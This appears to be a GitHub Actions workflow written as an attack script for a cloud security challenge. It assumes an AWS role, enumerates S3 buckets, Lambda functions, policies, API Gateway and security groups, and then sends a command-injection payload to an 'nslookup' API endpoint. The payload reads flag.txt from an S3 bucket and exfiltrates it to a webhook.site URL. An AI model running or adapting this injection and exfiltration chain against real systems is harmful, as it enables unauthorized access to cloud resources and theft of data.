name: assume-role
on:
  push:
    branches: [corgi]

permissions:
  id-token: write
  contents: read

jobs:
  assume:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::009661764077:role/cicdRole
          aws-region: us-east-1
      - run: aws s3 ls s3://codec4f26c862a321ef5 || true
      - run: aws s3 ls s3://site781fe43f26b9eba3 || true
      - run: aws lambda get-function --function-name nslookupv2 || true
      - run: aws lambda get-function-configuration --function-name nslookupv2 || true
      - run: aws s3api get-bucket-policy --bucket codec4f26c862a321ef5 || true
      - run: aws apigateway get-rest-apis || true
      - run: aws lambda get-policy --function-name nslookupv2 || true
      - run: aws ec2 describe-vpc-endpoints || true
      - run: aws ec2 describe-security-groups --group-ids sg-0de9d1a2c42a08a3e || true
      - run: pip install awscurl
      - run: |
          curl -s -X POST \
            -H "Content-Type: application/json" \
            -d '{"domain":"example.com; FLAG=$(/opt/aws s3 cp s3://codec4f26c862a321ef5/flag.txt - 2>&1); curl -s \"https://webhook.site/cdcf275b-535e-401a-a1fa-eb5d600adbad?flag=$FLAG\""}' \
            "https://3q931syi7b.execute-api.us-east-1.amazonaws.com/dev/nslookup"